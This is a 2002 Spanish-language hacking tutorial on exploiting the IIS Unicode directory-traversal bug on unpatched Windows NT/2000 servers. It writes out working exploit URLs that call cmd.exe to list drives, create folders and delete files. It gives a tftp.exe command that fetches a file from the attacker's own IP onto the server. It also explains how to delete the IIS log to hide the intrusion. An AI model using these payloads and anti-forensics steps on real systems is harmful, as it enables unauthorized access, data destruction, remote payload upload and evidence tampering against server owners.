
       /===================================================\                  
       | Explotacion del Unicode sobre plataformas NT y 2K |==========\
       \===================================================/          /                                                                                           by nAcHiTo


...una buena forma de empezar en esto...   


En los servidores que corran Windows NT y Windows 2000 con el servicio IIS, 
es decir Internet Information Server y no esten parcheados se puede encontrar 
el bug del Unicode. Este bug, si asi se puede llamar, se basa en la navegacion 
por los directorios de Windows por medio de las barras "/" "\", lo que nos 
permite, con un par de comandos mas, salir del directorio, comunmente 
"wwwroot", y navegar por los otros directorios del disco rigido del server. 
Lo que hacemos accediendo al disco duro del server de esta manera es controlar
lo que comunmente se usa en Windows como el command.com, que en los sistemas 
operativos comp WinNT y Win2k recibe el nombre de cmd.exe. Asi que por medio 
de la barra de exploracion de un navegador, en nuestro caso el Internet
Explorer podemos mandarle comandos a ejecutarse en la consola de Ms-Dos dentro
del servidor. Estos comandos son los comunes de dos, por ejemplo (mkdir, ren,
dir, del, copy, etc). Esto nos permite, con los comandos anteriormente
nombrados, sobre el servidor, borrar, copiar, renombrar archivos o crear,
borrar y renombrar directorios.

	Ejemplo:

http://www.servidor.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
		Esto nos estaria listando la unidad c: (del hd)

ACLARACION:
           En los servers es imposible que tengan un solo hd asi que proba el 
           comando de arriba con opciones como:
		
                  	 c+dir+d:\
			 c+dir+e:\
			 c+dir+f:\	y segui probando asi...	
				

Creando carpeta:

http://www.servidor.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+mkdir+c:\hola

		
Borrando archivos:

http://www.servidor.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+del+c:\cualquier.archivo
		

Y asi sucesivamente...
Hay que tener en cuenta que Ms-Dos no permite archivos de mas de 8 caracteres,
es decir si en la barra del explorador escribimos:

http://www.servidor.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\Mis Documentos

nos dara error, esto se le debe a lo anteriormente nombrado, algo facil para
que no pase esto es contar los caracteres de una carpeta de izquierda a 
derecha cuando suman seis se le agraga ~1 y la extension.

	Ejemplo:

	C:\Mis Documentos ===> Mal
	
	C:\MisDoc~1 ===> Bien

...y asi con los otros:
	
	C:\Program Files  ===> Mal
	C:\Progra~1	  ===> Bien
	
	En resumen es:
	
	Ej:

	Mis Documentos
	123 456+~1


Otro peque�o defecto del pobre NT y 2K es la existencia de un programa 
llamado TFTP que trabaja en el puerto 69 con la finalidad, (nuestra finalidad)
de subir archivos. Este se puede conseguir en http://membres.tripod.fr/phjounin/P_tftpd32.htm 
es un execuable que ocupa muy poco y que nos sirve para mucho.
El modo de uso de este es el siguiente:


http://www.servidor.com/scripts/..%255c..%255cwinnt/system32/     sigue abajo=>
tftp.exe?+"-i"+Nuestroip+GET+archivo.extension+C:\DirectorioRemoto\archivo.extension


Nota:
	DirectorioRemoto := Direct~1

Asi se pondra en funcionamiento el TFTP en nuestra maquina mandando el archivo
seleccionado.

Mini faq:
	
El TFTP es un cliente de ftp que trae WinNt y 2K, el parametro "-i" le indica
al programa que el archivo a subir va a ser binario, de lo contrario este no
se pone, nuestro ip no cero que haya mucha explicacion para eso. El comando 
GET le indica al programa que va a extraer un archivo de un servidor y lo de 
archivo local, y remoto no hay que pensarlo mucho.

A modo de cierre, tendriamos que hablar un poco de lo que vamos a dejar, 
aparte de algun que otro exploit. Es el LOG, dentro de todo seria importante 
que te desagas de el, para esto tienes borrarlo. Se encuentra en c:\WINNT\system32\logfiles\in10323.log .
Tus pasos se van a grabar un ratito despues 2, 3 minutos, asi que cuando
terminar de hacer lo que tenes que hacer esperas un rato vas y lo borras,
con la tecnica anteriormente nombrada. Si no, adjunto se encuentra un
programa que hice que lo hace automatico (delog.exe), lo unicoque tenes
que hacer es subirlo al C:\ del server y ejecutarlo.

Bueno esto deja en claro que la teoria de que Microsoft hace software inseguro
puede ser cierta, pero no les hechemos toda la culpa a ellos, tambien es culpa 
nuestra de usar lo que ellos hacen.	

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-ATENCION: en /proggies/win van a poder encontrar una version beta del "Mal0r CgiScanner"(mcs),           que les va a servir tanto para escanear el unicode/decode como para otros cgi's ... 
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=	

		Explotacion del Unicode sobre plataformas NT y 2K
							
				    Argentina 16/04/2002, nAcHiTo

Dudas, consultas, saludos, flammes ---< nachit0@ciudad.com.ar >---
